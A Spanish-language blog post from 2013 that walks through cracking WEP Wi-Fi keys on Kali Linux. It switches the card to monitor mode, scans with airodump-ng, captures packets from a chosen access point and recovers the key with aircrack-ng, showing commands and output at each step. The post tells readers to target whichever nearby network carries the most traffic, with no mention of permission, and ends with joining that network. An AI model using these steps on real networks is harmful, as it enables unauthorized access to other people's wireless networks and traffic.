27/3/13

Kali Linux obteniendo WEPKEY

Buenas que tal hoy les mostrare una forma de obtener claves WEP utilizando esta nueva distribucion de linux  llamada Kali al parecer es la sucesora de backtrack

Para empezar este mismo metodo lo he utilizado con Fedora, hay varias formas de obtener una WEPKEY aqui les mostrare una se puede decir un tanto facil.

Abriremos una consola o terminal como gusten llamarla y accederemos como root una vez hecho esto vemos nuestras interfaces de red con el siguiente comando


#ifconfig Obtendrán algo así. Donde fácilmente vemos el nombre de la tarjeta.


eth0.....Link encap:Ethernet HWaddr 00:E0:B8: FA:8A:B0
..............UP BROADCAST MULTICAST MTU:1500 Metric:1
..............RX packets:0 errors:0 dropped:0 overruns:0 frame:0
..............TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
..............collisions:0 txqueuelen:1000
..............RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
..............Interrupt:45 Base address:0x2000

lo......... Link encap:Local Loopback
..............inet addr:127.0.0.1 Mask:255.0.0.0
..............inet6 addr: ::1/128 Scope:Host
..............UP LOOPBACK RUNNING MTU:16436 Metric:1
..............RX packets:300 errors:0 dropped:0 overruns:0 frame:0
..............TX packets:300 errors:0 dropped:0 overruns:0 carrier:0
..............collisions:0 txqueuelen:0
..............RX bytes:18920 (18.4 KiB) TX bytes:18920 (18.4 KiB)

wlan0...Link encap:Ethernet HWaddr 00:1F:3C:76: F4:6C
..............inet addr:192.168.0.13 Bcast:192.168.0.255 Mask:255.255.255.0
..............inet6 addr: fe80::21f:3cff:fe76:f46c/64 Scope:Link
..............UP BROADCAST NOTRAILERS RUNNING PROMISC ALLMULTI MTU:1500 Metric:1
..............RX packets:51182 errors:0 dropped:0 overruns:0 frame:0
..............TX packets:42865 errors:0 dropped:0 overruns:0 carrier:0
..............collisions:0 txqueuelen:1000
..............RX bytes:40377324 (38.5 MiB) TX bytes:5865294 (5.5 MiB)




En la consola y como root, desactivamos la tarjeta y la ponemos en modo monitor.

#ifconfig wlan0 down

#iwconfig wlan0 mode monitor

4. Buscamos todas las redes disponibles. y ahy seleccionaremos ala cual deseamos obtener la WEP de preferencia debera ser la que mayor cantidad de #Data genere


4.1-#airodump-ng wlan0 Obtendrán algo así.

CH 10 ][ Elapsed: 4 s ][ 2011-01-17 22:10

BSSID__________________PWR___Beacons___#Data__#/s__CH__MB___ENC___CIPHER AUTH ESSID
00:24:56:A5:14:91_-90______6_________0______0___3___54___WEP__WEP________IFINITUM####
00:21:00:6D:B1:A9_-73_____20________100____0___11__54____WEP__WEP________cablevision##

BSSID_______________STATION____________PWR___Rate___Lost__Packets__Probes
00:21:00:6D:B1:A9__00:00:00:00:00:00_-91__0-1____25___5________cablevision##

Cerramos el programa precionando Ctrl + C


5. En el ejemplo anterior vemos la red que mas Datos genera y empezamos a capturarlos. Necesitaremos un poco de información de la pantalla anterior (Bssid y CH)

5.1 #airodump-ng -c 11 --bssid 00:21:00:6D:B1:A9 -w nombre-nuestro-archivo wlan0 -c hace referencia al canal de la PA, --bssid a la dirección MAC de la PA y -w indica el nombre para el archivo donde se capturan los paquetes

CH 11 ][ Elapsed: 0 s ][ 2011-01-17 22:52 ][ fixed channel wlan0: 5

BSSID_______________PWR___Beacons___#Data__#/s__CH__MB___ENC___CIPHER AUTH ESSID
00:21:00:6D:B1:A9_-73_____20________100____0___11__54___WEP____WEP________cablevision##

BSSID_______________STATION____________PWR___Rate___Lost__Packets__Probes
00:21:00:6D:B1:A9__00:00:00:00:00:00_-91__0-1____25___5________cablevision##

6. Dejaremos que nuestros paquetes sean capturados. Necesitaremos por lo menos 20,000 paquetes. No Exagero, este proceso sera tardado y aveces frustrante, pero es la forma mas fácil. Mientras tanto podemos dejar trabajando aircrack para que valla buscando la contraseña. Aircrack se auto-ejecutara cada 5,000 paquetes. Introduciremos la BSSID de la estación objetivo.

6.1#aircrack-ng -b 00:21:00:6D:B1:A9 nombre-nuestro-archivo-01.cap Noten que el programa automáticamente agrega un -01 al final de nuestro archivo. Este se ira incrementando amenos de que borremos los archivos con anterioridad.

__________________________Aircrack-ng 1.1


[00:00:04] Tested 50 keys (got 29377 IVs)

KB__depth__byte(vote)
0___0/ 2___00(38400) B9(36608) 3A(35072) 6D(35072) 26(34816) 2A(34816)
1___0/ 2___00(39424) C8(36352) 01(35072) 1B(35072) 7E(34560) 93(34560)
2___2/ 4___C4(35840) 00(34816) 21(34816) 5C(34048) 38(33792) 44(33792)
3___0/ 4___00(38400) 18(37888) FA(36352) 86(35584) E1(35072) ED(35072)
4___0/ 1___00(41472) 41(37376) 06(36608) CC(35840) 4C(35072) 67(34560)

KEY FOUND! [ 00:00:00:00:00 ]
Decrypted correctly: 100%

7. Finalmente levantamos nuestra red
7.1-#ifconfig wlan0 up
y re-habilitamos nuestra red en el Networkmanager y nos conectamos con la clave

No hay comentarios:

Publicar un comentario